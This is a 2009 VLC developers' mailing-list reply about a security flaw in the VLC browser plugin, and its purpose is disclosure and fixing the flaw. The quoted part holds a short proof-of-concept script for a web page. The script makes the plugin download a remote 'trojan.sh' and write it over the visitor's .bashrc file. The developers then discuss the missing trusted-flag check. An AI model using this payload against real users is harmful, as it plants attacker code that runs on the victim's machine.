[vlc-devel] Regarding the seemingly still "obscure" security problem
Rémi Denis-Courmont
rem at videolan.org
Sat Jan 17 16:38:24 CET 2009
Le samedi 17 janvier 2009 17:34:04 Jean-Baptiste Kempf, vous avez écrit :
> On Sat, Jan 17, 2009 at 03:26:25PM +0200, Rémi Denis-Courmont wrote :
> > <script type="text/javascript"><!--
> > var vlc = document.getElementById("vlc");
> > var src = "http/dump://www.example.com/trojan.sh";
> > var dst = ".bashrc";
> > vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
> > vlc.playlist.play ();
> > //!--></script>
> > </body>
> > </html>
>
> I think this was brought to attention during the summit.
>
> One question is: could we, in the plugin call add( ),
> detect demuxdump, sout and file-logging options and in that case,
> warn the user that some file will be overwritten?
The core has had safe and unsafe options for this purpose for a year already.
The stupid Mozilla plugin (and perhaps others) is obviously not setting the
trusted flag properly.
--
Rémi Denis-Courmont
http://git.remlab.net/cgi-bin/gitweb.cgi?p=vlc-courmisch.git;a=summary
More information about the vlc-devel
mailing list